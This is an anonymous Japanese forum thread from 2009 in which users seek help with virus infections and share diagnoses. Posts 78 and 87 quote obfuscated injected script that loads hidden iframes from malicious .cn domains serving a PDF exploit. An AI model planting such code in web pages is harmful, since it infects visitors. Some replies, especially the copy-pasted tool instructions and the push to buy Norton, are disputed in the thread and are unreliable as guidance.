マルウェアの具体的な詳細知りたいのですが検索のヒントになるようなキーワード覚えてないでしょうか?
60 :名無しさん@お腹いっぱい。:2009/07/04(土) 03:08:28
>>58
ん。ちとマズイなその感染は。
修復できないならリカバリ。
ttp://detail.chiebukuro.yahoo.co.jp/qa/question_detail/q1316561503
Sens.dllがなくなるとこうなる
ttp://okwave.jp/qa3280337.html
ん。ちとマズイなその感染は。
修復できないならリカバリ。
ttp://detail.chiebukuro.yahoo.co.jp/qa/question_detail/q1316561503
Sens.dllがなくなるとこうなる
ttp://okwave.jp/qa3280337.html
61 :名無しさん@お腹いっぱい。:2009/07/04(土) 13:23:46
62 :名無しさん@お腹いっぱい。:2009/07/07(火) 02:07:43
ちょっと教えてもらいたいのですが、
1週間前のことですが、DVDのトレーがたまに開閉するようになり、
ノイズかなんかかなぁぐらいで放置していましたが、
2日目位からネットの接続が遅くなり、グーグルは開けますが、ヤフーを開くと固まってしまう状態でした。
なんか怖くなり、トレンドマイクロのオンラインでスキャンしましたが、何も出ず
SPYBOTでスキャンしたところダブルクリックのスパイウェアが1個出てきただけでした。
ブラウザの表示が困難になったので、ママンを変えるついでにVISTAを再インスコしたら
直ったので事なきを得たのですが、これは何かのウイルスに感染していたのでしょうか?
または、ママンの故障なのでしょうか?SSD、メモリは流用したので壊れてはいませんでした。
申し訳ないのですが、何かおわかりになられる方がいらっしゃいましたらご教授願います。
お願いいたします。
1週間前のことですが、DVDのトレーがたまに開閉するようになり、
ノイズかなんかかなぁぐらいで放置していましたが、
2日目位からネットの接続が遅くなり、グーグルは開けますが、ヤフーを開くと固まってしまう状態でした。
なんか怖くなり、トレンドマイクロのオンラインでスキャンしましたが、何も出ず
SPYBOTでスキャンしたところダブルクリックのスパイウェアが1個出てきただけでした。
ブラウザの表示が困難になったので、ママンを変えるついでにVISTAを再インスコしたら
直ったので事なきを得たのですが、これは何かのウイルスに感染していたのでしょうか?
または、ママンの故障なのでしょうか?SSD、メモリは流用したので壊れてはいませんでした。
申し訳ないのですが、何かおわかりになられる方がいらっしゃいましたらご教授願います。
お願いいたします。
DVDも流用しましたが、壊れていませんでした。
64 :名無しさん@お腹いっぱい。:2009/07/07(火) 23:33:13
scrのファイル踏んでしまった
ファイルのほとんどがT605の拡張子で237kbになってしまった
ほんとにファイルはあぼーんになったの?
どうすればいい?
助けてください。
ファイルのほとんどがT605の拡張子で237kbになってしまった
ほんとにファイルはあぼーんになったの?
どうすればいい?
助けてください。
65 :名無しさん@お腹いっぱい。:2009/07/08(水) 02:19:06
トレンドマイクロのオンラインスキャンを
始めようとすると、サービスを開始できません。とでるのですが
どうしてでしょうか?以前は問題なくできていたのですが・・・
OSはVISTA HEデス
始めようとすると、サービスを開始できません。とでるのですが
どうしてでしょうか?以前は問題なくできていたのですが・・・
OSはVISTA HEデス
66 :名無しさん@お腹いっぱい。:2009/07/08(水) 04:45:21
67 :名無しさん@お腹いっぱい。:2009/07/08(水) 12:17:38
>>64
ファイルは消えた。OS再インストール
ファイルは消えた。OS再インストール
68 :名無しさん@お腹いっぱい。:2009/07/08(水) 20:09:15
というか、そういうデータ破壊系のものが
昔からあるウイルスなんだが。
スパイじみた挙動を見せるタイプは最近になって増えたらしい。
昔からあるウイルスなんだが。
スパイじみた挙動を見せるタイプは最近になって増えたらしい。
69 :名無しさん@お腹いっぱい。:2009/07/12(日) 13:35:17
src踏みました
フォルダ内の動画が画像ファイルに上書きされるのを見て
とにかく強制終了、再起動してもウィンドウズが立ち上がらないので
ウィンドウズを再インストール
なんとか起動後、デスクトップ画面は普通で
まずOSとは別のパーテーションにあるミュージックフォルダを確認
各アーティスト毎のフォルダ内は一見無事に見えましたが、
確認してる内にどんどん画像ファイルに上書きされてました・・・
そこでまたあせって強制終了、また立ち上がらなくなりました。
Cドライブだけ初期化して
別のパーテーションを残しても、ウィルスは残ってますかね?
やはり全ての初期化しか方法は無いでしょうか
フォルダ内の動画が画像ファイルに上書きされるのを見て
とにかく強制終了、再起動してもウィンドウズが立ち上がらないので
ウィンドウズを再インストール
なんとか起動後、デスクトップ画面は普通で
まずOSとは別のパーテーションにあるミュージックフォルダを確認
各アーティスト毎のフォルダ内は一見無事に見えましたが、
確認してる内にどんどん画像ファイルに上書きされてました・・・
そこでまたあせって強制終了、また立ち上がらなくなりました。
Cドライブだけ初期化して
別のパーテーションを残しても、ウィルスは残ってますかね?
やはり全ての初期化しか方法は無いでしょうか
70 :名無しさん@お腹いっぱい。:2009/07/12(日) 13:36:31
すいませんsrcじゃなくscrでした
71 :名無しさん@お腹いっぱい。:2009/07/12(日) 13:46:42
>やはり全ての初期化しか方法は無いでしょうか
うん
うん
72 :名無しさん@お腹いっぱい。:2009/07/12(日) 15:13:14
73 :名無しさん@お腹いっぱい。:2009/07/12(日) 16:13:54
ファイル(レジストリ含む)を書き換えられたらどうしようもない
HIPSで防ぐしかないだろ
HIPSで防ぐしかないだろ
74 :名無しさん@お腹いっぱい。:2009/07/15(水) 23:09:22
質問です。
私のウイルスセキュリティZEROたんがトロイを数匹見つけるほど末期なパソコン状態です。
せっかくウイルスバスターを買ったのですが、試供品を別のパソコンで使ってるので
それが終わってからにしようとたらたらしていたらどんどんひどいことになっています。
昨日くらいから、マイコンピュータを開くと問答無用で応答無し→送信しますか?状態になります
これを、マイピクチャからフォルダを選択したらCドライブの中とか外付けの中に逝くことはできます
こういう現象はウイルスのせいでしょうか?
僕はどうしたらいいでしょうか?
よろしくお願いします。
私のウイルスセキュリティZEROたんがトロイを数匹見つけるほど末期なパソコン状態です。
せっかくウイルスバスターを買ったのですが、試供品を別のパソコンで使ってるので
それが終わってからにしようとたらたらしていたらどんどんひどいことになっています。
昨日くらいから、マイコンピュータを開くと問答無用で応答無し→送信しますか?状態になります
これを、マイピクチャからフォルダを選択したらCドライブの中とか外付けの中に逝くことはできます
こういう現象はウイルスのせいでしょうか?
僕はどうしたらいいでしょうか?
よろしくお願いします。
75 :名無しさん@お腹いっぱい。:2009/07/15(水) 23:25:45
まるち
76 :名無しさん@お腹いっぱい。:2009/07/16(木) 01:41:58
はわわ
77 :名無しさん@お腹いっぱい。:2009/07/16(木) 04:20:51
きれいな水ですから…
78 :名無しさん@お腹いっぱい。:2009/07/16(木) 19:05:32
HPを勝手にいじられました
中にあったのは
script
document.write("<"+"i"+"f"+"rame
src=http:"+"//upda"+"t"+"edat"+"e."+"c"+"n/"+" height=1
width"+"=1"+">"+"</if"+"ram"+"e>");
/script
"や+をはぶくと
updatedate.cn/
ですが、どんなウィルスでしょう?
中にあったのは
script
document.write("<"+"i"+"f"+"rame
src=http:"+"//upda"+"t"+"edat"+"e."+"c"+"n/"+" height=1
width"+"=1"+">"+"</if"+"ram"+"e>");
/script
"や+をはぶくと
updatedate.cn/
ですが、どんなウィルスでしょう?
79 :名無しさん@お腹いっぱい。:2009/07/16(木) 19:08:35
PDF系じゃないだろうか……
81 :名無しさん@お腹いっぱい。:2009/07/16(木) 19:58:02
クリーンインストール推奨。
終わったらパスワード変更も忘れずに。
終わったらパスワード変更も忘れずに。
82 : ◆N9P3SuvBPo :2009/07/16(木) 21:26:02
>80
ちなみに、そのupdatedate.cnのソース(難読化されたScript)の、VirusTotalのスキャン結果
ttp://www.virustotal.com/jp/analisis/694dfbd3d77e09b5ea46c4bea1267d66130b6d53dc277e510019cd7ae1e557e7-1247747295
ちなみに、そのupdatedate.cnのソース(難読化されたScript)の、VirusTotalのスキャン結果
ttp://www.virustotal.com/jp/analisis/694dfbd3d77e09b5ea46c4bea1267d66130b6d53dc277e510019cd7ae1e557e7-1247747295
83 :名無しさん@お腹いっぱい。:2009/07/16(木) 21:34:33
私も>>78と同じ事になっています
一体どういう事が起こっているんでしょうか…
クリーンインストールというと、やはりウィルスなんですか?
私はFTPを使っています。
アップロード直後はそのソースは出ないんですけど…
一体どういう事が起こっているんでしょうか…
クリーンインストールというと、やはりウィルスなんですか?
私はFTPを使っています。
アップロード直後はそのソースは出ないんですけど…
84 : ◆N9P3SuvBPo :2009/07/16(木) 21:48:32
どうやら、>>79の言う通りPDFを落させようとしますね…はい。
そのPDFファイルのソースが取れたので、VirusTotalに掛けようとしたら
「ファイルはすでに解析されてる」と出ました。結果です。
ttp://www.virustotal.com/jp/analisis/d92424f3e9a0abf909d92afe6d6682d681f3feab0dabf2951f4d26f7b6236b76-1247719801
そのPDFファイルのソースが取れたので、VirusTotalに掛けようとしたら
「ファイルはすでに解析されてる」と出ました。結果です。
ttp://www.virustotal.com/jp/analisis/d92424f3e9a0abf909d92afe6d6682d681f3feab0dabf2951f4d26f7b6236b76-1247719801
85 :八頭 ◆YAGApwSaEw :2009/07/16(木) 22:36:46
このテのタイプだろうね
Exploit-PDF.b.gen ウイルス情報 マカフィー
ttp://www.mcafee.com/japan/security/virE.asp?v=Exploit-PDF.b.gen
情報だけシマに渡しておいた
Exploit-PDF.b.gen ウイルス情報 マカフィー
ttp://www.mcafee.com/japan/security/virE.asp?v=Exploit-PDF.b.gen
情報だけシマに渡しておいた
86 :名無しさん@お腹いっぱい。:2009/07/16(木) 23:55:12
>updatedate.cn
Adobe Readerの旧版にある脆弱性を突くPDFファイルを読み込ませて、
ウイルスを起動させる。(GENOウイルスと同じ)
FTPパスを抜くウイルスに感染してるとか?
Adobe Readerの旧版にある脆弱性を突くPDFファイルを読み込ませて、
ウイルスを起動させる。(GENOウイルスと同じ)
FTPパスを抜くウイルスに感染してるとか?
でもFTPを使わないで
直接借りてるサーバー(FC2無料)からアップロードしても
数時間後にはそのタグが出てるんですよね。
私の所のタグでは、
<script>document.write("<iframe" +" sr"+"c=h" +"t"+"tp://delzz" +"erro.c"+"n/ " +"he"+"ight=1 "+"widt" +"h=1"+"></ifr" +"a" +"me"+">");</script>
<script>document.write("<iframe"+" s"+"rc="+"h" +"tt"+"p://"+"updat" +"edate.cn/ "+"hei"+"ght=1 wi" +"dth=1"+"><"+"/ifra"+"m"+"e" +">");</script>
というものが出ます。
色々省くとh ttp://delzzerro.cn/ と h ttp://updatedate.cn/
ウィルスだとしたら、どう対処したらいいんですかね…
調べても上がってこなくって、結構焦ってます。
直接借りてるサーバー(FC2無料)からアップロードしても
数時間後にはそのタグが出てるんですよね。
私の所のタグでは、
<script>document.write("<iframe" +" sr"+"c=h" +"t"+"tp://delzz" +"erro.c"+"n/ " +"he"+"ight=1 "+"widt" +"h=1"+"></ifr" +"a" +"me"+">");</script>
<script>document.write("<iframe"+" s"+"rc="+"h" +"tt"+"p://"+"updat" +"edate.cn/ "+"hei"+"ght=1 wi" +"dth=1"+"><"+"/ifra"+"m"+"e" +">");</script>
というものが出ます。
色々省くとh ttp://delzzerro.cn/ と h ttp://updatedate.cn/
ウィルスだとしたら、どう対処したらいいんですかね…
調べても上がってこなくって、結構焦ってます。
88 :名無しさん@お腹いっぱい。:2009/07/19(日) 11:07:13
IPA 情報処理推進機構:情報セキュリティ:脆弱性対策:SQLインジェクション検出ツール
http://www.ipa.go.jp/security/vuln/iLogScanner/index.html
IPA 情報処理推進機構:情報セキュリティ:脆弱性対策:安全なウェブサイト運営入門
http://www.ipa.go.jp/security/vuln/7incidents/index.html
IPA 情報処理推進機構 (情報セキュリティに関する届出)
*コンピュータウイルスの相談窓口としてコンピュータウイルス110番の電話を設置
http://www.ipa.go.jp/security/todoke/
http://www.ipa.go.jp/security/vuln/iLogScanner/index.html
IPA 情報処理推進機構:情報セキュリティ:脆弱性対策:安全なウェブサイト運営入門
http://www.ipa.go.jp/security/vuln/7incidents/index.html
IPA 情報処理推進機構 (情報セキュリティに関する届出)
*コンピュータウイルスの相談窓口としてコンピュータウイルス110番の電話を設置
http://www.ipa.go.jp/security/todoke/
89 :名無しさん@お腹いっぱい。:2009/07/19(日) 11:17:27
C:\Program Files (x86)\Windows Live\Photo Gallery\WLXPhotoAcquireWizard.exe
Windows7x64でAvast!つかってるんだが、昨日の定義で上記のexeがウィルスとして検出されるようになったんだが、
これって誤爆じゃないの?
Windows7x64でAvast!つかってるんだが、昨日の定義で上記のexeがウィルスとして検出されるようになったんだが、
これって誤爆じゃないの?
90 :名無しさん@お腹いっぱい。:2009/07/20(月) 01:34:24
winnyをよくやってるんですが、winnyみたいに日本でしか使われていないソフトに発生する
ウイルスって、海外製のウイルス対策ソフトの対応度合いってどうなんでしょうか?
winnyやるなら国産の(といってもウイルスバスターしかないのかしら?)の方が良いでしょうか?
アホみたいな質問で済みません・・。
ウイルスって、海外製のウイルス対策ソフトの対応度合いってどうなんでしょうか?
winnyやるなら国産の(といってもウイルスバスターしかないのかしら?)の方が良いでしょうか?
アホみたいな質問で済みません・・。
91 :名無しさん@お腹いっぱい。:2009/07/20(月) 16:39:10
やめたほうがいいな
92 :名無しさん@お腹いっぱい。:2009/07/20(月) 17:23:43
comodo使ってるんですが
Firefoxを開いただけで送信接続数が600とかになることがあります
なにかトロイにでも感染したんでしょうか?
Firefoxを開いただけで送信接続数が600とかになることがあります
なにかトロイにでも感染したんでしょうか?
93 :名無しさん@お腹いっぱい。:2009/07/21(火) 17:09:17
フレッツウィルスクリアでTROJ Gen.4X2633が検出されたんですがこれはなんなんでしょう?
94 :名無しさん@お腹いっぱい。:2009/07/21(火) 17:41:22
>>93
TROJ Gen.4X2633
TROJ Gen.4X2633
95 :名無しさん@お腹いっぱい。:2009/07/22(水) 02:12:28
【使用OS】 『XP sp3』
【PCスペック】 『CPU: 3.00GHz 、メモリ: 1.96GB』
【使用ブラウザ】 『IE』
【Microsoft Updateの更新の状態】 『自動更新設定』
【セキュリティソフトと年式】 『ウイルスバスター 2009』
【その他スパイウェア対策ソフト】 『ウイルスバスター 2009』
【回線の種類・ルータの有無】 『光回線でルータ使用』
【具体的な症状】
ファイアフォックス起動時に一瞬小さいウインドウの残像?が見える
気になってカペルスキーオンラインスキャンをしたら
C:\Program Files\Trend Micro\Virus Buster\Quarantine\195.tmp
がTrojan-PSW.Win32.Nilage.djlに感染しているとでました。
C:\Program Files\Trend Micro\Virus Buster\Quarantineを開いても
195.tmpというファイルが見つかりません。
ファイアフォックス起動時に一瞬小さいウインドウの残像?が見えるのと
このウィルスは関係がありますか?
駆除するには再セットアップでしょうか?
【PCスペック】 『CPU: 3.00GHz 、メモリ: 1.96GB』
【使用ブラウザ】 『IE』
【Microsoft Updateの更新の状態】 『自動更新設定』
【セキュリティソフトと年式】 『ウイルスバスター 2009』
【その他スパイウェア対策ソフト】 『ウイルスバスター 2009』
【回線の種類・ルータの有無】 『光回線でルータ使用』
【具体的な症状】
ファイアフォックス起動時に一瞬小さいウインドウの残像?が見える
気になってカペルスキーオンラインスキャンをしたら
C:\Program Files\Trend Micro\Virus Buster\Quarantine\195.tmp
がTrojan-PSW.Win32.Nilage.djlに感染しているとでました。
C:\Program Files\Trend Micro\Virus Buster\Quarantineを開いても
195.tmpというファイルが見つかりません。
ファイアフォックス起動時に一瞬小さいウインドウの残像?が見えるのと
このウィルスは関係がありますか?
駆除するには再セットアップでしょうか?
96 :名無しさん@お腹いっぱい。:2009/07/22(水) 02:23:31
>>95
OTL
ttp://oldtimer.geekstogo.com/OTL.exe
OTL.exeをデスクトップへダウンロード
アクティブなプログラムウインドウをすべて閉じて、OTL.exeを実行します
上段にある「Scan All Users」の箇所にチェックを入れてから、「Run Scan」をクリック
ログ抽出走査が終了すると、
「OTL.Txt」と「Extra.txt」がメモ帳で開いて、デスクトップ上に2つのテキストが自動的に保存されています
RootRepeal - Rootkit Detector
ttp://rootrepeal.googlepages.com/
RootRepealの最新バージョンをデスクトップへダウンロード
RootRepeal.rar解凍し、アクティブなプログラムウインドウをすべて閉じて、RootRepeal.exeを実行
下列から「Report」タブを選択、左下の「Scan」ボタンをクリック
「Select Scan」ダイアログが表示されるので、すべてにチェックを入れて > OK
次にScanするドライブを問われるので、「C:\」にチェックを入れて > OK > Scan走査がスタート(*Scan中は「Files」タブになっています)
ログ抽出走査が停止したら、
「RootRepeal report.Txt」がメモ帳で開いて、C:にテキストが自動的に保存されています
OTLとRootRepealのログを新規フォルダにコピー&ペーストしてから、フォルダを圧縮
件名とフォルダ名をを、「[ Report ] - Infection log report」として以下へ送信
■Symantec Security Response 〔Upload a suspected infected file : 疑わしいファイルの提出〕
https://submit.symantec.com/websubmit/retail.cgi
*ファイルや圧縮ファイル〔Password無し、File数9個未満、10MB未満〕やtxtレポート で調査依頼の提出が出来ます
これでワクチンが作られるので、次回のパターンファイル更新で対応されますw
OTL
ttp://oldtimer.geekstogo.com/OTL.exe
OTL.exeをデスクトップへダウンロード
アクティブなプログラムウインドウをすべて閉じて、OTL.exeを実行します
上段にある「Scan All Users」の箇所にチェックを入れてから、「Run Scan」をクリック
ログ抽出走査が終了すると、
「OTL.Txt」と「Extra.txt」がメモ帳で開いて、デスクトップ上に2つのテキストが自動的に保存されています
RootRepeal - Rootkit Detector
ttp://rootrepeal.googlepages.com/
RootRepealの最新バージョンをデスクトップへダウンロード
RootRepeal.rar解凍し、アクティブなプログラムウインドウをすべて閉じて、RootRepeal.exeを実行
下列から「Report」タブを選択、左下の「Scan」ボタンをクリック
「Select Scan」ダイアログが表示されるので、すべてにチェックを入れて > OK
次にScanするドライブを問われるので、「C:\」にチェックを入れて > OK > Scan走査がスタート(*Scan中は「Files」タブになっています)
ログ抽出走査が停止したら、
「RootRepeal report.Txt」がメモ帳で開いて、C:にテキストが自動的に保存されています
OTLとRootRepealのログを新規フォルダにコピー&ペーストしてから、フォルダを圧縮
件名とフォルダ名をを、「[ Report ] - Infection log report」として以下へ送信
■Symantec Security Response 〔Upload a suspected infected file : 疑わしいファイルの提出〕
https://submit.symantec.com/websubmit/retail.cgi
*ファイルや圧縮ファイル〔Password無し、File数9個未満、10MB未満〕やtxtレポート で調査依頼の提出が出来ます
これでワクチンが作られるので、次回のパターンファイル更新で対応されますw
97 :名無しさん@お腹いっぱい。:2009/07/22(水) 02:32:16
>>96は何を勘違いしてるのか。
ウイルスバスター を 使ってる人に ウイルスバスター と 関係の無い シマンテック社に
訳の分からんもん送れって アホか。
ノートン が 対応しても ウイルスバスター は 対応しませんよね。
意味のないことするな!
あと そんな怪しげなファイル 使わねーって。
ウイルスバスター を 使ってる人に ウイルスバスター と 関係の無い シマンテック社に
訳の分からんもん送れって アホか。
ノートン が 対応しても ウイルスバスター は 対応しませんよね。
意味のないことするな!
あと そんな怪しげなファイル 使わねーって。
98 :名無しさん@お腹いっぱい。:2009/08/13(木) 23:21:27
ドライバをランダムに削除するウィルスってあるんですか?
ググっても出てこないんですが。
ググっても出てこないんですが。
99 :名無しさん@お腹いっぱい。:2009/08/14(金) 01:44:00
他スレの書き込み。
"OTL.exe"は、McAfeeでは、「検出済み: Artemis!3974A453958C (トロイの木馬)」
となって、DL出来ないよ。一時的にシールド外せばDLして調べることも出来るけど、やめた。
"OTL.exe"をVTでスキャンすると
CAT-QuickHeal 10.00 2009.08.04 (Suspicious) - DNAScan
eSafe 7.0.17.0 2009.08.03 Suspicious File
McAfee+Artemis 5697 2009.08.03 Artemis!3974A453958C
McAfee-GW-Edition 6.8.5 2009.08.04 Heuristic.LooksLike.Win32.Suspicious.C!83
Sophos 4.44.0 2009.08.04 Mal/Emogen-Y
で検出されたが
"OTL.exe"は、McAfeeでは、「検出済み: Artemis!3974A453958C (トロイの木馬)」
となって、DL出来ないよ。一時的にシールド外せばDLして調べることも出来るけど、やめた。
"OTL.exe"をVTでスキャンすると
CAT-QuickHeal 10.00 2009.08.04 (Suspicious) - DNAScan
eSafe 7.0.17.0 2009.08.03 Suspicious File
McAfee+Artemis 5697 2009.08.03 Artemis!3974A453958C
McAfee-GW-Edition 6.8.5 2009.08.04 Heuristic.LooksLike.Win32.Suspicious.C!83
Sophos 4.44.0 2009.08.04 Mal/Emogen-Y
で検出されたが
100 :八頭 ◆YAGApwSaEw :2009/08/15(土) 03:59:23
>>99
ttp://www.virustotal.com/jp/analisis/688ce51d54bbbfa7cbaca9a9b68bee1f6c09fec8c3b9fcb7a3bf9f4d69e2eb99-1250276493
CAT-QuickHealとSophosが定義修正してるから
McAfeeに連絡しておいた方がいいよ
eSafeは連絡しても修正してくれないから放っておけw
ttp://www.virustotal.com/jp/analisis/688ce51d54bbbfa7cbaca9a9b68bee1f6c09fec8c3b9fcb7a3bf9f4d69e2eb99-1250276493
CAT-QuickHealとSophosが定義修正してるから
McAfeeに連絡しておいた方がいいよ
eSafeは連絡しても修正してくれないから放っておけw
101 :八頭 ◆YAGApwSaEw :2009/08/15(土) 04:17:29
>>99
100は旧バージョンの結果だったスマンヌ
旧OTL File size: 501760 bytes
ttp://www.virustotal.com/jp/analisis/688ce51d54bbbfa7cbaca9a9b68bee1f6c09fec8c3b9fcb7a3bf9f4d69e2eb99-1250277761
現OTL File size: 514048 bytes
ttp://www.virustotal.com/jp/analisis/161355d30bc20464c5e2785db7ba75691f41fcae55a37ccc848653453983a093-1250277770
100は旧バージョンの結果だったスマンヌ
旧OTL File size: 501760 bytes
ttp://www.virustotal.com/jp/analisis/688ce51d54bbbfa7cbaca9a9b68bee1f6c09fec8c3b9fcb7a3bf9f4d69e2eb99-1250277761
現OTL File size: 514048 bytes
ttp://www.virustotal.com/jp/analisis/161355d30bc20464c5e2785db7ba75691f41fcae55a37ccc848653453983a093-1250277770
102 :名無しさん@お腹いっぱい。:2009/08/17(月) 22:00:45
なんだもう1001になったのか
103 :名無しさん@お腹いっぱい。:2009/08/18(火) 19:52:40
PC初心者なんだけど、ファイル共有ソフト使ってなければ
ファイルとか画像が勝手に流出することはないの?
ファイルとか画像が勝手に流出することはないの?
104 :名無しさん@お腹いっぱい。:2009/08/18(火) 20:31:16
105 :名無しさん@お腹いっぱい。:2009/08/18(火) 22:05:25
>>103
山田オルタでググってみ
山田オルタでググってみ
106 :名無しさん@お腹いっぱい。:2009/08/19(水) 09:57:44
【使用OS】 「XP home」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「avast 4.8」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「最新」
【スパイウェア対策ソフト】 「AVG spybot」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「はい」
【ルータの有無】 「有」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「無し」
起動時にマイドキュメントが開いてしまうので
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Win!dows NT\CurrentVersion\WinlogonC:\WINDOWS\system32\userinit.exe,
に書き換えて再起動したところ、ログインしても瞬時にログオフされるようになりました。
セーフモードにしても同様です。
検索してもこの症状の人は解決には至っておらず、とても困っております。
もうリカバリーかOS再インスコしか道がないのでしょうか…
どうしても残しておきたいデータがあって…
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「avast 4.8」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「最新」
【スパイウェア対策ソフト】 「AVG spybot」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「はい」
【ルータの有無】 「有」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「無し」
起動時にマイドキュメントが開いてしまうので
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Win!dows NT\CurrentVersion\WinlogonC:\WINDOWS\system32\userinit.exe,
に書き換えて再起動したところ、ログインしても瞬時にログオフされるようになりました。
セーフモードにしても同様です。
検索してもこの症状の人は解決には至っておらず、とても困っております。
もうリカバリーかOS再インスコしか道がないのでしょうか…
どうしても残しておきたいデータがあって…
107 :名無しさん@お腹いっぱい。:2009/08/19(水) 11:31:42
>>106
OTL
ttp://oldtimer.geekstogo.com/OTL.exe
OTL.exeをデスクトップへダウンロード
アクティブなプログラムウインドウをすべて閉じて、OTL.exeを実行します
上段にある「Scan All Users」の箇所にチェックを入れてから、「Run Scan」をクリック
ログ抽出走査が終了すると、
「OTL.Txt」と「Extra.txt」がメモ帳で開いて、デスクトップ上に2つのテキストが自動的に保存されています
RootRepeal - Rootkit Detector
ttp://rootrepeal.googlepages.com/
RootRepealの最新バージョンをデスクトップへダウンロード
RootRepeal.rar解凍し、アクティブなプログラムウインドウをすべて閉じて、RootRepeal.exeを実行
下列から「Report」タブを選択、左下の「Scan」ボタンをクリック
「Select Scan」ダイアログが表示されるので、すべてにチェックを入れて > OK
次にScanするドライブを問われるので、「C:\」にチェックを入れて > OK > Scan走査がスタート(*Scan中は「Files」タブになっています)
ログ抽出走査が停止したら、
「RootRepeal report.Txt」がメモ帳で開いて、C:にテキストが自動的に保存されています
OTLとRootRepealのログを新規フォルダにコピー&ペーストしてから、フォルダを圧縮
件名とフォルダ名をを、「[ Report ] - Infection log report」として以下へ送信
■Symantec Security Response 〔Upload a suspected infected file : 疑わしいファイルの提出〕
https://submit.symantec.com/websubmit/retail.cgi
*ファイルや圧縮ファイル〔Password無し、File数9個未満、10MB未満〕やtxtレポート で調査依頼の提出が出来ます
これでワクチンが作られるので、次回のパターンファイル更新で対応されますw
OTL
ttp://oldtimer.geekstogo.com/OTL.exe
OTL.exeをデスクトップへダウンロード
アクティブなプログラムウインドウをすべて閉じて、OTL.exeを実行します
上段にある「Scan All Users」の箇所にチェックを入れてから、「Run Scan」をクリック
ログ抽出走査が終了すると、
「OTL.Txt」と「Extra.txt」がメモ帳で開いて、デスクトップ上に2つのテキストが自動的に保存されています
RootRepeal - Rootkit Detector
ttp://rootrepeal.googlepages.com/
RootRepealの最新バージョンをデスクトップへダウンロード
RootRepeal.rar解凍し、アクティブなプログラムウインドウをすべて閉じて、RootRepeal.exeを実行
下列から「Report」タブを選択、左下の「Scan」ボタンをクリック
「Select Scan」ダイアログが表示されるので、すべてにチェックを入れて > OK
次にScanするドライブを問われるので、「C:\」にチェックを入れて > OK > Scan走査がスタート(*Scan中は「Files」タブになっています)
ログ抽出走査が停止したら、
「RootRepeal report.Txt」がメモ帳で開いて、C:にテキストが自動的に保存されています
OTLとRootRepealのログを新規フォルダにコピー&ペーストしてから、フォルダを圧縮
件名とフォルダ名をを、「[ Report ] - Infection log report」として以下へ送信
■Symantec Security Response 〔Upload a suspected infected file : 疑わしいファイルの提出〕
https://submit.symantec.com/websubmit/retail.cgi
*ファイルや圧縮ファイル〔Password無し、File数9個未満、10MB未満〕やtxtレポート で調査依頼の提出が出来ます
これでワクチンが作られるので、次回のパターンファイル更新で対応されますw
108 :名無しさん@お腹いっぱい。:2009/08/19(水) 11:40:52
>>107(続き)
Norton Internet Security 2009を購入します
ttp://a.imagehost.org/0851/3_4.jpg
インストール>アップグレード>スキャン
A-Squared Freeをインストール>スキャン
ここまでやればHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Win!dows NT\CurrentVersion\WinlogonC:\WINDOWS\system32\userinit.exe,が正常になると思ってますw
リカバリを奨める似非回答者が現れる可能性がありますので、注意してくださいね
Norton Internet Security 2009を購入します
ttp://a.imagehost.org/0851/3_4.jpg
インストール>アップグレード>スキャン
A-Squared Freeをインストール>スキャン
ここまでやればHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Win!dows NT\CurrentVersion\WinlogonC:\WINDOWS\system32\userinit.exe,が正常になると思ってますw
リカバリを奨める似非回答者が現れる可能性がありますので、注意してくださいね
109 :名無しさん@お腹いっぱい。:2009/08/19(水) 11:47:18
110 :名無しさん@お腹いっぱい。:2009/08/19(水) 11:51:01
データ吸い出したいだけならKNOPPIX等のCDで起動できるLinux使って
USBメモリ等にデータをコピー
Windowsを起動できるようにしたいなら、回復コンソールを起動して、
システムの復元領域からレジストリをコピー
でも、たぶんOS再インストールしちゃったほうが、時間が無駄にならなくてすむよ
USBメモリ等にデータをコピー
Windowsを起動できるようにしたいなら、回復コンソールを起動して、
システムの復元領域からレジストリをコピー
でも、たぶんOS再インストールしちゃったほうが、時間が無駄にならなくてすむよ
111 :名無しさん@お腹いっぱい。:2009/08/19(水) 12:09:21
112 :名無しさん@お腹いっぱい。:2009/08/19(水) 15:27:04
113 :名無しさん@お腹いっぱい。:2009/08/19(水) 16:37:07
114 :名無しさん@お腹いっぱい。:2009/08/27(木) 09:09:19
【使用OS】Windows XP HE SP3
【Microsoft Update(MU)の状態】常に最新
【使用セキュリティソフトとバージョン】ノートンインターネットセキュリティ2009 16.7.2.10
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】Yes
【スパイウェア対策ソフト】特に無し
【ルータの有無】有り
PCの電源を切るときに、半分くらいの確率で「ccSvcHstプログラムの終了中です」「このプログラムは応答していません」と表示されます。
これ自体はノートン関連のファイルという事がわかっているのですが、問題はこのエラーが表示された際に必ずセットで表示される、以下の画像のエラーです。
http://up2.viploader.net/pic/src/viploader1148679.jpg
「ccSvcHstプログラムの終了中です」が表示されずにすんなりと終了する時には表示されません。
必ずccSvcHstとセットになっています。
自分なりに調べてみたところn.exeはUSBウイルスだと分かったのですが、
・フォルダの設定で隠しファイルはちゃんと表示できる
・各ドライブ直下にautorun.infが無い
・Cドライブ直下にn.exeやvb8jc.exeなどが無い
など、感染している症状は見当たりませんでした。
また、PCにインストールしているノートンインターネットセキュリティ2009と
カスペルキーのオンラインスキャンを実行しましたがウイルスは発見できませんでした。
症状としては感染しているようには見えないのですが、どうしても『n』というプログラムが気になります。
これはウイルスではないのでしょうか?またウイルスだった場合、手動での確認が不可能な段階まで進行しているのでしょうか?
不安でご飯も3杯しか喉を通りません助けてください。
【Microsoft Update(MU)の状態】常に最新
【使用セキュリティソフトとバージョン】ノートンインターネットセキュリティ2009 16.7.2.10
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】Yes
【スパイウェア対策ソフト】特に無し
【ルータの有無】有り
PCの電源を切るときに、半分くらいの確率で「ccSvcHstプログラムの終了中です」「このプログラムは応答していません」と表示されます。
